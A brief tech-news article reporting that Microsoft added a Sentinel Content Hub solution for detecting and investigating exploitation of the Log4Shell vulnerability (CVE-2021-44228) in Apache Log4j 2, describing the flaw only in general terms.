Microsoft Azure Sentinel can now detect Apache Log4j vulnerabilities

Home » Azure

Reading time icon 1 min. read

Calendar icon Published on

by Surur Davids 

published on

Share this article

Readers help support MSpoweruser. We may get a commission if you buy through our links. Tooltip Icon

Read our disclosure page to find out how can you help MSPoweruser sustain the editorial team Read more

Microsoft Azure Sentinel is Microsoft’s native Security Information and Event Management (SIEM) tool built within Azure. Azure Sentinel enables SecOps teams to see and stop threats before they cause any harm to the organizations. Azure Sentinel is powered by AI to reduce noise and Microsoft claims that you can see an overall reduction of up to 90 percent in alert fatigue.

Microsoft’s security research teams has been tracking threats taking advantage of the remote code execution (RCE) vulnerability in Apache Log4j 2 referred to as “Log4Shell” and tracked as CVE-2021-44228. The vulnerability allows unauthenticated remote code execution and is triggered when a specially crafted string provided by the attacker through a variety of different input vectors is parsed and processed by the Log4j 2 vulnerable component.

The company has now announced that a new Microsoft Sentinel solution has been added to the Content Hub that provides content to monitor, detect and investigate signals related to exploitation of the recently disclosed Log4j vulnerability.

For technical and mitigation information about the vulnerability, please read:

Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploitation.

via RedMondMag

More about the topics: Apache Log4j, Azure Sentinel, microsoft, Microsoft Azure Sentinel, security

Surur Davids

Surur Davids Shield

Smartphone Expert

Surur Davids is the founder of WMPoweruser which later became MSPoweruser.com. He's a smartphone expert with over a decade of experience.